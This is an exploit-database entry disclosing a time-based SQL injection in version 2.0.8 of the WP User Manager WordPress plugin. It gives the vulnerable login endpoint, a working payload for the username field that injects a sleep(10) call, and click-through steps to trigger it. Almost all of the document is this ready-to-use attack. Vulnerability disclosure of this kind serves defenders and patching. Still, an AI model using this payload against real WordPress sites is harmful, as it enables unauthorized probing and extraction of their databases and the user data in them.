WordPress WP User Manager 2.0.8 SQL Injection Vulnerability

2018-11-12
ID: 100178
CVE: None
Download vulnerable application: None
# Exploit Title: WP User Manager v2.0.8 (WordPress Plugin) - Time-Based SQL Injection
  # Author: Socket_0x03 (Alvaro J. Gene)
 ____________________________________________________________________________________
   # Software Link: https://wordpress.org/plugins/wp-user-manager
  # Plugin: WP User Manager
  # Version: v2.0.8 (last version)
  # File: login
  # Input: username
  # Language: This application is available in English language.
  # Plugin Description: A WordPress plugin to create user profiles with registration,
   login, password recovery, and other features.
    ____________________________________________________________________________________
   #  Time-Based SQL Injection:
      http://www.website.com/wordpress/index.php/login
    Username: iawcfqto'=sleep(10)='
    Password: password
    Click on Login
1-4-2 (www02)